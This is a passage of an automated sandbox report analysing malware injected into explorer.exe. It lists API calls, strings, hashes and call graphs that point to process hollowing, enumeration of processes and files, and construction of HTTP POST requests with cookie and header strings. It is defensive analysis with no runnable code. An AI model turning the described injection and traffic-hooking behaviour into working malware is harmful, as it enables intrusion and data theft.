                                                                                                                          • API ID: Memory$CriticalSectionVirtualZerolstrcat$CloseCreateEnterFreeHandleLeaveMoveQueryThreadlstrlenwsprintf
                                                                                                                          • String ID: $Content-Length:$POST
                                                                                                                          • API String ID: 2960674810-114478848
                                                                                                                          • Opcode ID: f5d46b17048e903a705c21edc524fae78a344e701164596b1d5e77289a5e7752
                                                                                                                          • Instruction ID: fe9a34ef344471ca7ce3e746a50c8d420f6b1f6bf723b8b0df43a82769c71ff6
                                                                                                                          • Opcode Fuzzy Hash: f5d46b17048e903a705c21edc524fae78a344e701164596b1d5e77289a5e7752
                                                                                                                          • Instruction Fuzzy Hash: 5F310630E503A08BCB25EF24948476A7BAFBB84305F150A6CE80693245CF79851DEFE9
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02C21000: GetProcessHeap.KERNEL32(00000008,00000208,02C21418), ref: 02C21003
                                                                                                                            • Part of subcall function 02C21000: RtlAllocateHeap.NTDLL(00000000), ref: 02C2100A
                                                                                                                            • Part of subcall function 02C2106C: lstrlen.KERNEL32(?,?,00000000,00000000,02C2189F,774C8A60,?,00000000), ref: 02C21074
                                                                                                                            • Part of subcall function 02C2106C: MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000), ref: 02C21086
                                                                                                                            • Part of subcall function 02C217DC: RtlZeroMemory.NTDLL(?,00000018), ref: 02C217EE
                                                                                                                          • RtlZeroMemory.NTDLL(?,0000003C), ref: 02C218FB
                                                                                                                          • wsprintfW.USER32 ref: 02C219F2
                                                                                                                          • RtlMoveMemory.NTDLL(00000000,00000000,?), ref: 02C21AD0
                                                                                                                          Strings
                                                                                                                          • Content-Type: application/x-www-form-urlencoded, xrefs: 02C21A34
                                                                                                                          • Accept: */*Referer: %S, xrefs: 02C219E8
                                                                                                                          • POST, xrefs: 02C219A0
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Memory$HeapZero$AllocateByteCharMoveMultiProcessWidelstrlenwsprintf
                                                                                                                          • String ID: Accept: */*Referer: %S$Content-Type: application/x-www-form-urlencoded$POST
                                                                                                                          • API String ID: 3833683434-704803497
                                                                                                                          • Opcode ID: 2c2ce8644e761b390320adb1862dcb066d62c6273cfdd3140e38679bf6a36e31
                                                                                                                          • Instruction ID: 4332f614b7d71045073736157a3a8c043e49d028cef2629527b7fd8077104d7e
                                                                                                                          • Opcode Fuzzy Hash: 2c2ce8644e761b390320adb1862dcb066d62c6273cfdd3140e38679bf6a36e31
                                                                                                                          • Instruction Fuzzy Hash: 2B817C75644350AFD7249F68D884A2BBBE9EFC8354F04092DF549E3241DFB0D908CBA2
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02C2104C: VirtualAlloc.KERNEL32(00000000,00001105,00003000,00000040,02C22A16,?,00000001), ref: 02C21056
                                                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 02C225BB
                                                                                                                          • lstrcat.KERNEL32(?,02C242A8), ref: 02C225C7
                                                                                                                          • lstrcat.KERNEL32(?,?), ref: 02C225D6
                                                                                                                          • lstrcat.KERNEL32(?,02C242AC), ref: 02C225E5
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrcat$AllocVirtual
                                                                                                                          • String ID: :authority$?$dyn_header
                                                                                                                          • API String ID: 3028025275-1785586894
                                                                                                                          • Opcode ID: e78177e2f7da233660927a77ec9603eda73aa7310b363b702370ec87f4d8f252
                                                                                                                          • Instruction ID: a51f0f1875ac63733e327b8a36af268a75cfc8fce01421fcb34b0a0b0f34bdae
                                                                                                                          • Opcode Fuzzy Hash: e78177e2f7da233660927a77ec9603eda73aa7310b363b702370ec87f4d8f252
                                                                                                                          • Instruction Fuzzy Hash: 6C6107725083368FC724EE25D1D03AAB7EAABD4614F44092DEC8557282DF749E0DDBA3
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 02C21141: lstrlen.KERNEL32(?,?,?,00000000,?,02C229DD,00000001), ref: 02C21150
                                                                                                                            • Part of subcall function 02C21141: lstrlen.KERNEL32(:method POST,?,00000000,?,02C229DD,00000001), ref: 02C21155
                                                                                                                          • RtlMoveMemory.NTDLL(?,?,-00000008), ref: 02C2291B
                                                                                                                          • lstrcat.KERNEL32(?,02C242BC), ref: 02C2292A
                                                                                                                          • lstrlen.KERNEL32(?,774C8A60,00000001,?,?,00000000,?,?,02C22B26,?,?,?,?,00000001), ref: 02C2295C
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: lstrlen$MemoryMovelstrcat
                                                                                                                          • String ID: cookie
                                                                                                                          • API String ID: 2957667536-1295510418
                                                                                                                          • Opcode ID: 46bb471f51c402cdb321e2a6733dbc6b3987a7806e16a1e4ffc7cfa564e71703
                                                                                                                          • Instruction ID: 2dc82583ee7e4113b2bcc69289f6e8752a6f262e587b579c8bfa17ee12e6e944
                                                                                                                          • Opcode Fuzzy Hash: 46bb471f51c402cdb321e2a6733dbc6b3987a7806e16a1e4ffc7cfa564e71703
                                                                                                                          • Instruction Fuzzy Hash: FA11E7323043225BC724AE99DC84BAB76E9DB80704F15052DFC01A7241EFF1E94E8792
                                                                                                                          APIs
                                                                                                                          • RtlMoveMemory.NTDLL(?,?,?), ref: 02C21E83
                                                                                                                          • LoadLibraryA.KERNEL32(?,02C26058,00000000,00000000,774D2EE0,00000000,02C220DC,?), ref: 02C21EAB
                                                                                                                          • GetProcAddress.KERNEL32(00000000,-00000002), ref: 02C21ED8
                                                                                                                          • LdrProcessRelocationBlock.NTDLL(?,?,00000008,?), ref: 02C21F29
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: AddressBlockLibraryLoadMemoryMoveProcProcessRelocation
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3827878703-0
                                                                                                                          • Opcode ID: 0a5b21b3eb104e91c7a53354af4cbd0c060c27e86a99b61e7810e9fff666c9cc
                                                                                                                          • Instruction ID: dc895c709b65c001b58922d210e824a76dda699596d1a777c4c6d3bd455f7ea9
                                                                                                                          • Opcode Fuzzy Hash: 0a5b21b3eb104e91c7a53354af4cbd0c060c27e86a99b61e7810e9fff666c9cc
                                                                                                                          • Instruction Fuzzy Hash: 1531B8717002219BC724CF29CC84766B7D8FF45358B09456CE859C7602DBF2E559C7A0
                                                                                                                          APIs
                                                                                                                          • OpenProcess.KERNEL32(00000400,00000000), ref: 02C212BC
                                                                                                                          • IsWow64Process.KERNEL32(000000FF,?), ref: 02C212CE
                                                                                                                          • IsWow64Process.KERNEL32(00000000,?), ref: 02C212E1
                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 02C212F7
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process$Wow64$CloseHandleOpen
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 331459951-0
                                                                                                                          • Opcode ID: 9d282412743b22427e5144fa9f9b95d6fb411c0de8913bfb8d1890158a6b3b72
                                                                                                                          • Instruction ID: 5941ad69eb6cb3c31b46fb644da5081f4c373c47638c2a646fed50159c5fc7cf
                                                                                                                          • Opcode Fuzzy Hash: 9d282412743b22427e5144fa9f9b95d6fb411c0de8913bfb8d1890158a6b3b72
                                                                                                                          • Instruction Fuzzy Hash: 78F09071C56228FF9B24CFA0A9449EEBB6CEB01255F14436AF805D2141DB714F49DAE1
                                                                                                                          APIs
                                                                                                                          • RtlEnterCriticalSection.NTDLL(02C26038), ref: 02C23332
                                                                                                                          • RtlLeaveCriticalSection.NTDLL(02C26038), ref: 02C23358
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000016.00000002.2534826625.0000000002C21000.00000040.80000000.00040000.00000000.sdmp, Offset: 02C21000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_22_2_2c21000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$EnterLeave
                                                                                                                          • String ID: POST
                                                                                                                          • API String ID: 3168844106-1814004025
                                                                                                                          • Opcode ID: 6e5459986333712007ec4e798466db04d55932a85ef9889c97f468d42149e694
                                                                                                                          • Instruction ID: 0ea3437da5e0f22bec42dae31167738d4423d52cfa35263f32e4830ecef3bb5c
                                                                                                                          • Opcode Fuzzy Hash: 6e5459986333712007ec4e798466db04d55932a85ef9889c97f468d42149e694
                                                                                                                          • Instruction Fuzzy Hash: 6A01A231900274EBCB311F14E94896E7B2AEFC57617140451F90E83111CF35CA6EEAF1

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:7.9%
                                                                                                                          Dynamic/Decrypted Code Coverage:42%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:50
                                                                                                                          Total number of Limit Nodes:5
                                                                                                                          execution_graph 1486 a04914 1498 a01d08 CreateToolhelp32Snapshot 1486->1498 1489 a01d08 4 API calls 1490 a04941 1489->1490 1491 a01d08 4 API calls 1490->1491 1492 a0494d SleepEx 1491->1492 1497 a04962 1492->1497 1493 a04a18 1494 a049e0 1494->1493 1495 a01eb4 6 API calls 1494->1495 1495->1493 1497->1494 1504 a01eb4 1497->1504 1499 a01d7a 1498->1499 1500 a01d2c Process32First 1498->1500 1499->1489 1502 a01d44 1500->1502 1501 a01d71 CloseHandle 1501->1499 1502->1501 1503 a01d5f Process32Next 1502->1503 1503->1502 1512 a01db0 1504->1512 1506 a01ed6 1507 a01efd FindFirstFileW 1506->1507 1508 a01f8f 1507->1508 1511 a01f14 1507->1511 1508->1497 1509 a01f74 FindNextFileW 1510 a01f86 FindClose 1509->1510 1509->1511 1510->1508 1511->1509 1513 a01dde 1512->1513 1514 a01dfb FindFirstFileW 1513->1514 1515 a01e8e 1514->1515 1518 a01e12 1514->1518 1515->1506 1516 a01e73 FindNextFileW 1517 a01e85 FindClose 1516->1517 1516->1518 1517->1515 1518->1516 1519 a01eb4 3 API calls 1518->1519 1519->1518 1527 a0d637 1528 a0d62e 1527->1528 1529 a0d91d 1528->1529 1532 a0d748 1528->1532 1533 a0d74d 1532->1533 1534 a0d835 LoadLibraryA 1533->1534 1536 a0d884 VirtualProtect VirtualProtect 1533->1536 1538 a0d6f8 1533->1538 1534->1533 1537 a0d912 1536->1537 1520 a0d748 1521 a0d74d 1520->1521 1522 a0d835 LoadLibraryA 1521->1522 1524 a0d884 VirtualProtect VirtualProtect 1521->1524 1526 a0d879 1521->1526 1522->1521 1525 a0d912 1524->1525 1539 a0d5da 1540 a0d614 1539->1540 1541 a0d91d 1540->1541 1542 a0d748 3 API calls 1540->1542 1543 a0d6f8 1542->1543

                                                                                                                          Callgraph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          • Opacity -> Relevance
                                                                                                                          • Disassembly available
                                                                                                                          callgraph 0 Function_00A01CA0 1 Function_00A04BA0 2 Function_00A044A4 28 Function_00A04094 2->28 38 Function_00A03CF0 2->38 44 Function_00A03FC0 2->44 3 Function_00A04AA9 4 Function_00A03CAC 113 Function_00A0345C 4->113 5 Function_00A04BB0 6 Function_00A01FB0 7 Function_00A01DB0 9 Function_00A01EB4 7->9 22 Function_00A01D8C 7->22 65 Function_00A01838 7->65 93 Function_00A01860 7->93 8 Function_00A014B2 9->7 9->22 9->65 9->93 10 Function_00A0CFB7 11 Function_00A04BB8 12 Function_00A0D0BB 13 Function_00A01C80 14 Function_00A04280 14->65 71 Function_00A01A04 14->71 14->93 15 Function_00A04680 15->14 36 Function_00A01BE8 15->36 15->44 16 Function_00A04C80 21 Function_00A01A8C 16->21 30 Function_00A03D9C 16->30 16->36 53 Function_00A028D4 16->53 16->65 88 Function_00A0211C 16->88 16->93 102 Function_00A0277C 16->102 17 Function_00A02F84 18 Function_00A02F88 19 Function_00A03B8C 35 Function_00A018E8 19->35 19->71 109 Function_00A03B48 19->109 19->113 20 Function_00A0188C 20->65 23 Function_00A0268C 23->65 23->93 96 Function_00A02368 23->96 24 Function_00A03A90 24->23 24->35 83 Function_00A02214 24->83 24->93 25 Function_00A03690 25->71 26 Function_00A0CD92 27 Function_00A03094 27->18 27->65 27->93 40 Function_00A03FF8 28->40 28->65 28->71 28->93 29 Function_00A02298 31 Function_00A0299C 32 Function_00A045E0 32->14 32->36 32->44 33 Function_00A0CCE2 34 Function_00A021E4 37 Function_00A03AF0 42 Function_00A035FC 37->42 86 Function_00A03818 37->86 38->4 38->19 38->36 38->37 57 Function_00A03424 38->57 66 Function_00A0343C 38->66 67 Function_00A03C3C 38->67 39 Function_00A018F8 40->71 41 Function_00A014F9 42->36 42->93 43 Function_00A029C0 45 Function_00A0D0C3 46 Function_00A0D4C4 47 Function_00A01BC8 48 Function_00A018D0 49 Function_00A01CD0 50 Function_00A072D0 51 Function_00A014D4 52 Function_00A01FD4 52->6 52->52 52->65 52->93 53->36 63 Function_00A02838 53->63 111 Function_00A02754 53->111 54 Function_00A0D5DA 107 Function_00A0D748 54->107 55 Function_00A03F20 110 Function_00A03E4C 55->110 56 Function_00A01822 58 Function_00A01C28 59 Function_00A0D42D 60 Function_00A04B2E 61 Function_00A04C2E 62 Function_00A0D637 62->107 64 Function_00A01938 67->35 67->109 67->113 68 Function_00A05300 68->16 68->36 68->65 68->68 72 Function_00A05104 68->72 69 Function_00A02C00 69->36 69->43 82 Function_00A02B14 69->82 70 Function_00A01000 72->0 72->13 72->36 72->47 72->55 72->58 72->64 72->65 72->69 72->71 99 Function_00A01B74 72->99 73 Function_00A01405 74 Function_00A01D08 74->49 75 Function_00A01508 76 Function_00A0D70A 77 Function_00A0370C 77->71 78 Function_00A0CC0D 79 Function_00A02F10 79->65 80 Function_00A04710 80->28 80->35 80->36 80->38 80->40 80->44 80->48 80->71 81 Function_00A04914 81->9 81->65 81->74 81->93 83->65 84 Function_00A04C14 85 Function_00A0D416 86->25 86->34 86->35 86->48 86->65 86->71 86->77 86->93 87 Function_00A0311C 89 Function_00A0141D 90 Function_00A04B1E 91 Function_00A03F60 91->23 91->35 91->83 91->93 92 Function_00A01560 93->36 94 Function_00A0CD63 95 Function_00A02964 95->31 96->20 96->29 96->39 96->48 96->64 96->65 96->93 97 Function_00A0156C 98 Function_00A04B6F 100 Function_00A01576 101 Function_00A0317C 101->27 101->48 101->87 101->93 108 Function_00A03048 101->108 102->48 102->95 102->111 103 Function_00A04A7C 104 Function_00A0D57E 105 Function_00A04540 105->14 105->36 105->44 106 Function_00A04C42 107->76 108->65 109->79 109->101 110->65 110->93 112 Function_00A01254 113->20 113->36 113->65 114 Function_00A04C5C 115 Function_00A04B5E

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • FindFirstFileW.KERNELBASE ref: 00A01E03
                                                                                                                          • FindNextFileW.KERNELBASE ref: 00A01E7B
                                                                                                                          • FindClose.KERNELBASE ref: 00A01E88
                                                                                                                            • Part of subcall function 00A01EB4: FindFirstFileW.KERNELBASE ref: 00A01F05
                                                                                                                            • Part of subcall function 00A01EB4: FindNextFileW.KERNELBASE ref: 00A01F7C
                                                                                                                            • Part of subcall function 00A01EB4: FindClose.KERNELBASE ref: 00A01F89
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.2112682969.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_23_2_a01000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3541575487-0
                                                                                                                          • Opcode ID: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
                                                                                                                          • Instruction ID: f0260a3e05334e28ef0d7f959e7ca45b8015ed9052afc4be78d86b417a333f43
                                                                                                                          • Opcode Fuzzy Hash: f2bddda09024333371eb43016242b53df61dfea823ae35ba426e9e4184a3369c
                                                                                                                          • Instruction Fuzzy Hash: FE216F3121CE0C4BDB58EB2CF8992AD77D1EB98350F40466DF98EC32D6DE3899058785

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00A01DB0: FindFirstFileW.KERNELBASE ref: 00A01E03
                                                                                                                            • Part of subcall function 00A01DB0: FindNextFileW.KERNELBASE ref: 00A01E7B
                                                                                                                            • Part of subcall function 00A01DB0: FindClose.KERNELBASE ref: 00A01E88
                                                                                                                          • FindFirstFileW.KERNELBASE ref: 00A01F05
                                                                                                                          • FindNextFileW.KERNELBASE ref: 00A01F7C
                                                                                                                          • FindClose.KERNELBASE ref: 00A01F89
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.2112682969.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_23_2_a01000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$File$CloseFirstNext
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3541575487-0
                                                                                                                          • Opcode ID: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
                                                                                                                          • Instruction ID: ce31552f2af1e64724b654d1536646c45cf84d21af117f2f05c842e7c579bd45
                                                                                                                          • Opcode Fuzzy Hash: 0e40d73f1c3fb02f90445bbd535556d967509254f5ca54610527c95814f758f5
                                                                                                                          • Instruction Fuzzy Hash: D121327020CA4C4FDF44FF28A4997A977E1FBA8344F00066DA55AC32D2DF38DA488785

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 137 a05300-a05310 call a01be8 140 a05390-a05395 137->140 141 a05312-a05345 call a01838 137->141 145 a05371-a0538a NtUnmapViewOfSection 141->145 146 a05347 call a01838 141->146 148 a0539c-a053ab call a05104 145->148 149 a0538c-a0538e 145->149 150 a0534c-a05365 146->150 155 a053b5-a053be 148->155 156 a053ad-a053b0 call a05300 148->156 149->140 151 a05396-a0539b call a04c80 149->151 150->145 151->148 156->155
                                                                                                                          APIs
                                                                                                                          • NtUnmapViewOfSection.NTDLL ref: 00A05378
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.2112682969.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_23_2_a01000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: SectionUnmapView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 498011366-0
                                                                                                                          • Opcode ID: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                                                                                          • Instruction ID: 2eed2611f6adb8e46f4581c2c5d799a1fe9df2add04c7c1a8910f67e12c3c36d
                                                                                                                          • Opcode Fuzzy Hash: a5808401f40c052098661eb7ec96139c2b9ca3f0c031a4bcca73572e40d2a868
                                                                                                                          • Instruction Fuzzy Hash: 5611A330A01D0D4BEB5DB7B964A967A3395EB14301F54452AA415CA2E1DA698A408701

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.2112682969.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_23_2_a01000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 420147892-0
                                                                                                                          • Opcode ID: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
                                                                                                                          • Instruction ID: b7a8b5496bc00a297fa8f5687988fe97169e2871de6558757b73c15bb8c00770
                                                                                                                          • Opcode Fuzzy Hash: ae82cc3535c3e538fde35235a4c5f0d33198cca8bd70fb29295229ff6f9da322
                                                                                                                          • Instruction Fuzzy Hash: 45016230208A088FE755EF28E8887EE76E2FBDC315F004B2DA15EC7194DB38D9458B45

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 10 a0d748-a0d74b 11 a0d755-a0d759 10->11 12 a0d765 11->12 13 a0d75b-a0d763 11->13 14 a0d767 12->14 15 a0d74d-a0d753 12->15 13->12 16 a0d76a-a0d771 14->16 15->11 18 a0d773-a0d77b 16->18 19 a0d77d 16->19 18->19 19->16 20 a0d77f-a0d782 19->20 21 a0d784-a0d792 20->21 22 a0d797-a0d7a4 20->22 23 a0d794-a0d795 21->23 24 a0d7ce-a0d7e9 21->24 36 a0d7a6-a0d7a8 22->36 37 a0d7be-a0d7cc call a0d70a 22->37 23->22 25 a0d81a-a0d81d 24->25 27 a0d822-a0d829 25->27 28 a0d81f-a0d820 25->28 30 a0d82f-a0d833 27->30 29 a0d801-a0d805 28->29 34 a0d807-a0d80a 29->34 35 a0d7eb-a0d7ee 29->35 32 a0d884-a0d88d 30->32 33 a0d835-a0d84e LoadLibraryA 30->33 41 a0d890-a0d899 32->41 39 a0d84f-a0d856 33->39 34->27 42 a0d80c-a0d810 34->42 35->27 40 a0d7f0 35->40 43 a0d7ab-a0d7b2 36->43 37->11 39->30 45 a0d858-a0d86e 39->45 46 a0d7f1-a0d7f5 40->46 47 a0d89b-a0d89d 41->47 48 a0d8be-a0d90e VirtualProtect * 2 41->48 42->46 49 a0d812-a0d819 42->49 55 a0d7b4-a0d7ba 43->55 56 a0d7bc 43->56 61 a0d870-a0d877 45->61 62 a0d879-a0d883 45->62 46->29 52 a0d7f7-a0d7f9 46->52 53 a0d8b0-a0d8bc 47->53 54 a0d89f-a0d8ae 47->54 51 a0d912-a0d917 48->51 49->25 51->51 57 a0d919-a0d928 51->57 52->29 59 a0d7fb-a0d7ff 52->59 53->54 54->41 55->56 56->37 56->43 59->29 59->34 61->39
                                                                                                                          APIs
                                                                                                                          • LoadLibraryA.KERNELBASE(?,?,?,?,?,?,?,F6171042,?,2EC0275B), ref: 00A0D847
                                                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 00A0D8E5
                                                                                                                          • VirtualProtect.KERNELBASE ref: 00A0D903
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.2112682969.0000000000A0C000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A0C000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_23_2_a0c000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ProtectVirtual$LibraryLoad
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 895956442-0
                                                                                                                          • Opcode ID: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                                                                                          • Instruction ID: 4debb50baee0bdd4726e8daa9fa60d7dc1865b9c6b2ab553629134d50674ddb7
                                                                                                                          • Opcode Fuzzy Hash: 95f77aaacabe58910e5c9c5c8887ec348e2c323c674e048d1baf7834c42d2dbf
                                                                                                                          • Instruction Fuzzy Hash: C4517B3365491D4BCB24ABBCBCC43F5B7D1FB55335B58063AD49AC32C5EA68D84A8381

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 108 a01b74-a01b94 OpenFileMappingA 109 a01b96-a01bb4 MapViewOfFile 108->109 110 a01bb7-a01bc4 108->110 109->110
                                                                                                                          APIs
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.2112682969.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_23_2_a01000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: File$MappingOpenView
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3439327939-0
                                                                                                                          • Opcode ID: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                                                                                          • Instruction ID: 9f0c804ab2bd3f3f67a42ff66183b25b325b68ee4baa2aaa1fbe8960b73e3913
                                                                                                                          • Opcode Fuzzy Hash: 91acf1a8eced4a93386cc206dc094dd57211145f7045cabbad6f077073a0bd29
                                                                                                                          • Instruction Fuzzy Hash: A4F05834218F094FAB44EF7C9CCC126B7E0EBA8302B008A7AA84AC6164EF74C8808701

                                                                                                                          Control-flow Graph

                                                                                                                          • Executed
                                                                                                                          • Not Executed
                                                                                                                          control_flow_graph 111 a04914-a0496f call a01d08 * 3 SleepEx call a01838 120 a04977-a04979 111->120 121 a049e0-a049f4 120->121 122 a0497b-a0498e 120->122 125 a049f6-a04a13 call a01eb4 121->125 126 a04a18-a04a2f 121->126 127 a04994-a049de call a01838 call a01eb4 call a01860 122->127 125->126 127->121
                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00A01D08: CreateToolhelp32Snapshot.KERNEL32 ref: 00A01D1D
                                                                                                                            • Part of subcall function 00A01D08: Process32First.KERNEL32 ref: 00A01D3C
                                                                                                                            • Part of subcall function 00A01D08: CloseHandle.KERNELBASE ref: 00A01D74
                                                                                                                            • Part of subcall function 00A01D08: Process32Next.KERNEL32 ref: 00A01D67
                                                                                                                          • SleepEx.KERNELBASE ref: 00A04952
                                                                                                                            • Part of subcall function 00A01EB4: FindFirstFileW.KERNELBASE ref: 00A01F05
                                                                                                                            • Part of subcall function 00A01EB4: FindNextFileW.KERNELBASE ref: 00A01F7C
                                                                                                                            • Part of subcall function 00A01EB4: FindClose.KERNELBASE ref: 00A01F89
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000017.00000002.2112682969.0000000000A01000.00000040.80000000.00040000.00000000.sdmp, Offset: 00A01000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_23_2_a01000_explorer.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Find$CloseFileFirstNextProcess32$CreateHandleSleepSnapshotToolhelp32
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1868932505-0
                                                                                                                          • Opcode ID: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
                                                                                                                          • Instruction ID: 6c7bd7b756569691e78759491c87d2314865bded404f6a2467c922518eccbdb5
                                                                                                                          • Opcode Fuzzy Hash: d94504f5ac59451a2c57a4813436b0da2714d47fc540bee79ff9f433ebcff8c2
                                                                                                                          • Instruction Fuzzy Hash: EF31A731618A0C4FDB59FF68F8995EE73E2FB98301B10462EE54BC31A1DE34994587C0

                                                                                                                          Execution Graph

                                                                                                                          Execution Coverage:10.3%
                                                                                                                          Dynamic/Decrypted Code Coverage:97.4%
                                                                                                                          Signature Coverage:0%
                                                                                                                          Total number of Nodes:306
                                                                                                                          Total number of Limit Nodes:42
